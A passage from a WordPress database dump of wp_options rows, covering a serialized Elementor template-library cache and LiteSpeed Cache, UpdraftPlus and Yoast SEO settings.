29\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_9.png\";s:12:\"tmpl_created\";i:1520520569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/testimonial-29/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:664;s:16:\"popularity_index\";i:378;s:11:\"trend_index\";i:695;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:809;a:21:{s:4:\"tmpl\";i:588;s:2:\"id\";i:4939;s:5:\"title\";s:13:\"Testimonial 9\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/03/testimonials_black_8.png\";s:12:\"tmpl_created\";i:1520520565;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/testimonial-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:12:\"testimonials\";s:4:\"tags\";s:15:\"[\"Testimonial\"]\";s:10:\"menu_order\";i:665;s:16:\"popularity_index\";i:103;s:11:\"trend_index\";i:341;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:810;a:21:{s:4:\"tmpl\";i:928;s:2:\"id\";i:12509;s:5:\"title\";s:18:\"Travel – 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2019/12/404.png\";s:12:\"tmpl_created\";i:1575960378;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/travel-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:24:\"[\"404\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:666;s:16:\"popularity_index\";i:747;s:11:\"trend_index\";i:712;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:811;a:21:{s:4:\"tmpl\";i:929;s:2:\"id\";i:12516;s:5:\"title\";s:27:\"Travel – Archive Blog\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/12/Archiv_s.png\";s:12:\"tmpl_created\";i:1575960387;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/blocks/travel-archive-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:667;s:16:\"popularity_index\";i:496;s:11:\"trend_index\";i:487;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:812;a:21:{s:4:\"tmpl\";i:927;s:2:\"id\";i:12500;s:5:\"title\";s:21:\"Travel – Header\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2020/06/Header-travel-and-tours.png\";s:12:\"tmpl_created\";i:1575960371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/travel-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:27:\"[\"Header\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:668;s:16:\"popularity_index\";i:443;s:11:\"trend_index\";i:434;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:813;a:21:{s:4:\"tmpl\";i:930;s:2:\"id\";i:12524;s:5:\"title\";s:26:\"Travel – Single Post\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/12/Single_Post_s.png\";s:12:\"tmpl_created\";i:1575960397;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-single-post/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:669;s:16:\"popularity_index\";i:591;s:11:\"trend_index\";i:663;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:814;a:21:{s:4:\"tmpl\";i:931;s:2:\"id\";i:12531;s:5:\"title\";s:31:\"Travel – Single Post Tour\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2019/12/Single_Tour_s.png\";s:12:\"tmpl_created\";i:1575960404;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/blocks/travel-single-post-tour/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:670;s:16:\"popularity_index\";i:630;s:11:\"trend_index\";i:548;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:815;a:21:{s:4:\"tmpl\";i:926;s:2:\"id\";i:12492;s:5:\"title\";s:14:\"Travel -Footer\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2019/12/Footer_s.png\";s:12:\"tmpl_created\";i:1575960358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/travel-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:27:\"[\"Footer\",\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:671;s:16:\"popularity_index\";i:453;s:11:\"trend_index\";i:322;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:816;a:21:{s:4:\"tmpl\";i:1068;s:2:\"id\";i:15498;s:5:\"title\";s:23:\"Travel Blog – 404\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2020/11/404.jpg\";s:12:\"tmpl_created\";i:1606215636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/blocks/travel-blog-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:23:\"[\"404\",\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:672;s:16:\"popularity_index\";i:749;s:11:\"trend_index\";i:759;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:817;a:21:{s:4:\"tmpl\";i:1069;s:2:\"id\";i:15508;s:5:\"title\";s:29:\"Travel Blog – Archive 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-1-350.jpg\";s:12:\"tmpl_created\";i:1606215649;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:673;s:16:\"popularity_index\";i:659;s:11:\"trend_index\";i:468;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:818;a:21:{s:4:\"tmpl\";i:1070;s:2:\"id\";i:15518;s:5:\"title\";s:29:\"Travel Blog – Archive 2\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2020/11/Archive-2-350-Copy.jpg\";s:12:\"tmpl_created\";i:1606215663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/blocks/travel-blog-archive-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:674;s:16:\"popularity_index\";i:688;s:11:\"trend_index\";i:431;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:819;a:21:{s:4:\"tmpl\";i:1071;s:2:\"id\";i:15528;s:5:\"title\";s:26:\"Travel Blog – Footer\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Footer.jpg\";s:12:\"tmpl_created\";i:1606215673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:26:\"[\"Blog\",\"Footer\",\"Travel\"]\";s:10:\"menu_order\";i:675;s:16:\"popularity_index\";i:656;s:11:\"trend_index\";i:377;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:820;a:21:{s:4:\"tmpl\";i:1067;s:2:\"id\";i:15536;s:5:\"title\";s:26:\"Travel Blog – Header\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2020/11/Header.jpg\";s:12:\"tmpl_created\";i:1606215625;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/travel-blog-header/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"header\";s:4:\"tags\";s:26:\"[\"Blog\",\"Header\",\"Travel\"]\";s:10:\"menu_order\";i:676;s:16:\"popularity_index\";i:584;s:11:\"trend_index\";i:228;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:821;a:21:{s:4:\"tmpl\";i:1072;s:2:\"id\";i:15545;s:5:\"title\";s:33:\"Travel Blog – Single Post 1\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-1-350.jpg\";s:12:\"tmpl_created\";i:1606215684;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:677;s:16:\"popularity_index\";i:669;s:11:\"trend_index\";i:482;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:822;a:21:{s:4:\"tmpl\";i:1066;s:2:\"id\";i:15556;s:5:\"title\";s:33:\"Travel Blog – Single Post 2\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/11/Single-2-350.jpg\";s:12:\"tmpl_created\";i:1606215613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/blocks/travel-blog-single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:678;s:16:\"popularity_index\";i:652;s:11:\"trend_index\";i:454;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}}}','off'),(1261,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','off'),(1264,'elementor_library_category_children','a:0:{}','auto'),(1279,'_elementor_element_cache_unique_id','98f3ea6f5123c692158e8167bedfd4ac','auto'),(1410,'site_logo','366','auto'),(2184,'wpseo_taxonomy_meta','a:1:{s:8:\"category\";a:1:{i:6;a:2:{s:13:\"wpseo_linkdex\";s:5:\"-1073\";s:19:\"wpseo_content_score\";s:2:\"90\";}}}','auto'),(2185,'category_children','a:0:{}','auto'),(6154,'updraftplus-addons_siteid','2335e1a1add6b3487ad5c7fc89a5bc93','off'),(6161,'updraftplus_unlocked_fd','1','no'),(6162,'updraftplus_last_lock_time_fd','2026-09-05 01:16:48','no'),(6163,'updraftplus_semaphore_fd','0','no'),(6164,'updraft_last_scheduled_fd','1788571008','auto'),(6275,'wp_notes_notify','1','on'),(6276,'db_upgraded','','on'),(7740,'litespeed.conf.hash','IIL4eBvwotV3aAbay9YV2eyReBM431tM','auto'),(7741,'litespeed.conf.api_key','','auto'),(7742,'litespeed.conf.auto_upgrade','','auto'),(7743,'litespeed.conf.server_ip','','auto'),(7744,'litespeed.conf.guest','','auto'),(7745,'litespeed.conf.guest_optm','','auto'),(7746,'litespeed.conf.news','1','auto'),(7747,'litespeed.conf.guest_uas','[\"Lighthouse\",\"GTmetrix\",\"Google\",\"Pingdom\",\"bot\",\"spider\",\"PTST\",\"HeadlessChrome\"]','auto'),(7748,'litespeed.conf.guest_ips','[\"208.70.247.157\",\"172.255.48.130\",\"172.255.48.131\",\"172.255.48.132\",\"172.255.48.133\",\"172.255.48.134\",\"172.255.48.135\",\"172.255.48.136\",\"172.255.48.137\",\"172.255.48.138\",\"172.255.48.139\",\"172.255.48.140\",\"172.255.48.141\",\"172.255.48.142\",\"172.255.48.143\",\"172.255.48.144\",\"172.255.48.145\",\"172.255.48.146\",\"172.255.48.147\",\"52.229.122.240\",\"104.214.72.101\",\"13.66.7.11\",\"13.85.24.83\",\"13.85.24.90\",\"13.85.82.26\",\"40.74.242.253\",\"40.74.243.13\",\"40.74.243.176\",\"104.214.48.247\",\"157.55.189.189\",\"104.214.110.135\",\"70.37.83.240\",\"65.52.36.250\",\"13.78.216.56\",\"52.162.212.163\",\"23.96.34.105\",\"65.52.113.236\",\"172.255.61.34\",\"172.255.61.35\",\"172.255.61.36\",\"172.255.61.37\",\"172.255.61.38\",\"172.255.61.39\",\"172.255.61.40\",\"104.41.2.19\",\"191.235.98.164\",\"191.235.99.221\",\"191.232.194.51\",\"52.237.235.185\",\"52.237.250.73\",\"52.237.236.145\",\"104.211.143.8\",\"104.211.165.53\",\"52.172.14.87\",\"40.83.89.214\",\"52.175.57.81\",\"20.188.63.151\",\"20.52.36.49\",\"52.246.165.153\",\"51.144.102.233\",\"13.76.97.224\",\"102.133.169.66\",\"52.231.199.170\",\"13.53.162.7\",\"40.123.218.94\"]','auto'),(7749,'litespeed.conf.cache','1','auto'),(7750,'litespeed.conf.cache-priv','1','auto'),(7751,'litespeed.conf.cache-commenter','1','auto'),(7752,'litespeed.conf.cache-rest','1','auto'),(7753,'litespeed.conf.cache-page_login','1','auto'),(7754,'litespeed.conf.cache-mobile','','auto'),(7755,'litespeed.conf.cache-mobile_rules','[\"Mobile\",\"Android\",\"Silk\\/\",\"Kindle\",\"BlackBerry\",\"Opera Mini\",\"Opera Mobi\"]','auto'),(7756,'litespeed.conf.cache-browser','','auto'),(7757,'litespeed.conf.cache-exc_useragents','[]','auto'),(7758,'litespeed.conf.cache-exc_cookies','[]','auto'),(7759,'litespeed.conf.cache-exc_qs','[]','auto'),(7760,'litespeed.conf.cache-exc_cat','[]','auto'),(7761,'litespeed.conf.cache-exc_tag','[]','auto'),(7762,'litespeed.conf.cache-force_uri','[]','auto'),(7763,'litespeed.conf.cache-force_pub_uri','[]','auto'),(7764,'litespeed.conf.cache-priv_uri','[]','auto'),(7765,'litespeed.conf.cache-exc','[]','auto'),(7766,'litespeed.conf.cache-exc_roles','[]','auto'),(7767,'litespeed.conf.cache-drop_qs','[\"fbclid\",\"gclid\",\"utm*\",\"_ga\"]','auto'),(7768,'litespeed.conf.cache-ttl_pub','604800','auto'),(7769,'litespeed.conf.cache-ttl_priv','1800','auto'),(7770,'litespeed.conf.cache-ttl_frontpage','604800','auto'),(7771,'litespeed.conf.cache-ttl_feed','604800','auto'),(7772,'litespeed.conf.cache-ttl_rest','604800','auto'),(7773,'litespeed.conf.cache-ttl_browser','31557600','auto'),(7774,'litespeed.conf.cache-ttl_status','[\"404 3600\",\"500 600\"]','auto'),(7775,'litespeed.conf.cache-login_cookie','','auto'),(7776,'litespeed.conf.cache-ajax_ttl','[]','auto'),(7777,'litespeed.conf.cache-vary_cookies','[]','auto'),(7778,'litespeed.conf.cache-vary_group','[]','auto'),(7779,'litespeed.conf.purge-upgrade','','auto'),(7780,'litespeed.conf.purge-stale','','auto'),(7781,'litespeed.conf.purge-post_all','','auto'),(7782,'litespeed.conf.purge-post_f','1','auto'),(7783,'litespeed.conf.purge-post_h','1','auto'),(7784,'litespeed.conf.purge-post_p','1','auto'),(7785,'litespeed.conf.purge-post_pwrp','1','auto'),(7786,'litespeed.conf.purge-post_a','1','auto'),(7787,'litespeed.conf.purge-post_y','','auto'),(7788,'litespeed.conf.purge-post_m','1','auto'),(7789,'litespeed.conf.purge-post_d','','auto'),(7790,'litespeed.conf.purge-post_t','1','auto'),(7791,'litespeed.conf.purge-post_pt','1','auto'),(7792,'litespeed.conf.purge-timed_urls','[]','auto'),(7793,'litespeed.conf.purge-timed_urls_time','','auto'),(7794,'litespeed.conf.purge-hook_all','[\"switch_theme\",\"wp_create_nav_menu\",\"wp_update_nav_menu\",\"wp_delete_nav_menu\",\"create_term\",\"edit_terms\",\"delete_term\",\"add_link\",\"edit_link\",\"delete_link\"]','auto'),(7795,'litespeed.conf.esi','','auto'),(7796,'litespeed.conf.esi-cache_admbar','1','auto'),(7797,'litespeed.conf.esi-cache_commform','1','auto'),(7798,'litespeed.conf.esi-nonce','[\"stats_nonce\",\"subscribe_nonce\"]','auto'),(7799,'litespeed.conf.util-instant_click','','auto'),(7800,'litespeed.conf.util-no_https_vary','','auto'),(7801,'litespeed.conf.debug-disable_all','','auto'),(7802,'litespeed.conf.debug','0','auto'),(7803,'litespeed.conf.debug-ips','[\"127.0.0.1\"]','auto'),(7804,'litespeed.conf.debug-level','','auto'),(7805,'litespeed.conf.debug-filesize','3','auto'),(7806,'litespeed.conf.debug-collapse_qs','','auto'),(7807,'litespeed.conf.debug-inc','[]','auto'),(7808,'litespeed.conf.debug-exc','[]','auto'),(7809,'litespeed.conf.debug-exc_strings','[]','auto'),(7810,'litespeed.conf.db_optm-revisions_max','0','auto'),(7811,'litespeed.conf.db_optm-revisions_age','0','auto'),(7812,'litespeed.conf.optm-css_min','','auto'),(7813,'litespeed.conf.optm-css_comb','','auto'),(7814,'litespeed.conf.optm-css_comb_ext_inl','1','auto'),(7815,'litespeed.conf.optm-ucss','','auto'),(7816,'litespeed.conf.optm-ucss_inline','','auto'),(7817,'litespeed.conf.optm-ucss_whitelist','[]','auto'),(7818,'litespeed.conf.optm-ucss_file_exc_inline','[]','auto'),(7819,'litespeed.conf.optm-ucss_exc','[]','auto'),(7820,'litespeed.conf.optm-css_exc','[]','auto'),(7821,'litespeed.conf.optm-js_min','','auto'),(7822,'litespeed.conf.optm-js_comb','','auto'),(7823,'litespeed.conf.optm-js_comb_ext_inl','1','auto'),(7824,'litespeed.conf.optm-js_delay_inc','[]','auto'),(7825,'litespeed.conf.optm-js_exc','[\"jquery.js\",\"jquery.min.js\"]','auto'),(7826,'litespeed.conf.optm-html_min','','auto'),(7827,'litespeed.conf.optm-html_lazy','[]','auto'),(7828,'litespeed.conf.optm-html_skip_comment','[]','auto'),(7829,'litespeed.conf.optm-qs_rm','','auto'),(7830,'litespeed.conf.optm-ggfonts_rm','','auto'),(7831,'litespeed.conf.optm-css_async','','auto'),(7832,'litespeed.conf.optm-ccss_per_url','','auto'),(7833,'litespeed.conf.optm-ccss_sep_posttype','[\"page\"]','auto'),(7834,'litespeed.conf.optm-ccss_sep_uri','[]','auto'),(7835,'litespeed.conf.optm-ccss_whitelist','[]','auto'),(7836,'litespeed.conf.optm-css_async_inline','1','auto'),(7837,'litespeed.conf.optm-css_font_display','','auto'),(7838,'litespeed.conf.optm-js_defer','0','auto'),(7839,'litespeed.conf.optm-emoji_rm','','auto'),(7840,'litespeed.conf.optm-noscript_rm','','auto'),(7841,'litespeed.conf.optm-ggfonts_async','','auto'),(7842,'litespeed.conf.optm-exc_roles','[]','auto'),(7843,'litespeed.conf.optm-ccss_con','','auto'),(7844,'litespeed.conf.optm-js_defer_exc','[\"jquery.js\",\"jquery.min.js\",\"gtm.js\",\"analytics.js\"]','auto'),(7845,'litespeed.conf.optm-gm_js_exc','[]','auto'),(7846,'litespeed.conf.optm-dns_prefetch','[]','auto'),(7847,'litespeed.conf.optm-dns_prefetch_ctrl','','auto'),(7848,'litespeed.conf.optm-dns_preconnect','[]','auto'),(7849,'litespeed.conf.optm-exc','[]','auto'),(7850,'litespeed.conf.optm-guest_only','1','auto'),(7851,'litespeed.conf.object','','auto'),(7852,'litespeed.conf.object-kind','','auto'),(7853,'litespeed.conf.object-host','localhost','auto'),(7854,'litespeed.conf.object-port','11211','auto'),(7855,'litespeed.conf.object-life','360','auto'),(7856,'litespeed.conf.object-persistent','1','auto'),(7857,'litespeed.conf.object-admin','1','auto'),(7858,'litespeed.conf.object-transients','1','auto'),(7859,'litespeed.conf.object-db_id','0','auto'),(7860,'litespeed.conf.object-user','','auto'),(7861,'litespeed.conf.object-pswd','','auto'),(7862,'litespeed.conf.object-global_groups','[\"users\",\"userlogins\",\"useremail\",\"userslugs\",\"usermeta\",\"user_meta\",\"site-transient\",\"site-options\",\"site-lookup\",\"site-details\",\"blog-lookup\",\"blog-details\",\"blog-id-cache\",\"rss\",\"global-posts\",\"global-cache-test\"]','auto'),(7863,'litespeed.conf.object-non_persistent_groups','[\"comment\",\"counts\",\"plugins\",\"wc_session_id\"]','auto'),(7864,'litespeed.conf.discuss-avatar_cache','','auto'),(7865,'litespeed.conf.discuss-avatar_cron','','auto'),(7866,'litespeed.conf.discuss-avatar_cache_ttl','604800','auto'),(7867,'litespeed.conf.optm-localize','','auto'),(7868,'litespeed.conf.optm-localize_domains','[\"### Popular scripts ###\",\"https:\\/\\/platform.twitter.com\\/widgets.js\",\"https:\\/\\/connect.facebook.net\\/en_US\\/fbevents.js\"]','auto'),(7869,'litespeed.conf.media-lazy','','auto'),(7870,'litespeed.conf.media-lazy_placeholder','','auto'),(7871,'litespeed.conf.media-placeholder_resp','','auto'),(7872,'litespeed.conf.media-placeholder_resp_color','#cfd4db','auto'),(7873,'litespeed.conf.media-placeholder_resp_svg','<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"{width}\" height=\"{height}\" viewBox=\"0 0 {width} {height}\"><rect width=\"100%\" height=\"100%\" style=\"fill:{color};fill-opacity: 0.1;\"/></svg>','auto'),(7874,'litespeed.conf.media-lqip','','auto'),(7875,'litespeed.conf.media-lqip_qual','4','auto'),(7876,'litespeed.conf.media-lqip_min_w','150','auto'),(7877,'litespeed.conf.media-lqip_min_h','150','auto'),(7878,'litespeed.conf.media-placeholder_resp_async','1','auto'),(7879,'litespeed.conf.media-iframe_lazy','','auto'),(7880,'litespeed.conf.media-add_missing_sizes','','auto'),(7881,'litespeed.conf.media-lazy_exc','[]','auto'),(7882,'litespeed.conf.media-lazy_cls_exc','[\"wmu-preview-img\"]','auto'),(7883,'litespeed.conf.media-lazy_parent_cls_exc','[]','auto'),(7884,'litespeed.conf.media-iframe_lazy_cls_exc','[]','auto'),(7885,'litespeed.conf.media-iframe_lazy_parent_cls_exc','[]','auto'),(7886,'litespeed.conf.media-lazy_uri_exc','[]','auto'),(7887,'litespeed.conf.media-lqip_exc','[]','auto'),(7888,'litespeed.conf.media-vpi','','auto'),(7889,'litespeed.conf.media-vpi_cron','','auto'),(7890,'litespeed.conf.media-auto_rescale_ori','','auto'),(7891,'litespeed.conf.img_optm-auto','','auto'),(7892,'litespeed.conf.img_optm-ori','1','auto'),(7893,'litespeed.conf.img_optm-rm_bkup','','auto'),(7894,'litespeed.conf.img_optm-webp','0','auto'),(7895,'litespeed.conf.img_optm-lossless','','auto'),(7896,'litespeed.conf.img_optm-sizes_skipped','[]','auto'),(7897,'litespeed.conf.img_optm-exif','1','auto'),(7898,'litespeed.conf.img_optm-webp_attr','[\"img.src\",\"div.data-thumb\",\"img.data-src\",\"img.data-lazyload\",\"div.data-large_image\",\"img.retina_logo_url\",\"div.data-parallax-image\",\"div.data-vc-parallax-image\",\"video.poster\"]','auto'),(7899,'litespeed.conf.img_optm-webp_replace_srcset','','auto'),(7900,'litespeed.conf.img_optm-jpg_quality','82','auto'),(7901,'litespeed.conf.crawler','','auto'),(7902,'litespeed.conf.crawler-crawl_interval','302400','auto'),(7903,'litespeed.conf.crawler-load_limit','1','auto'),(7904,'litespeed.conf.crawler-sitemap','','auto'),(7905,'litespeed.conf.crawler-roles','[]','auto'),(7906,'litespeed.conf.crawler-cookies','[]','auto'),(7907,'litespeed.conf.misc-heartbeat_front','','auto'),(7908,'litespeed.conf.misc-heartbeat_front_ttl','60','auto'),(7909,'litespeed.conf.misc-heartbeat_back','','auto'),(7910,'litespeed.conf.misc-heartbeat_back_ttl','60','auto'),(7911,'litespeed.conf.misc-heartbeat_editor','','auto'),(7912,'litespeed.conf.misc-heartbeat_editor_ttl','15','auto'),(7913,'litespeed.conf.cdn','','auto'),(7914,'litespeed.conf.cdn-ori','[]','auto'),(7915,'litespeed.conf.cdn-ori_dir','[\"wp-content\",\"wp-includes\"]','auto'),(7916,'litespeed.conf.cdn-exc','[]','auto'),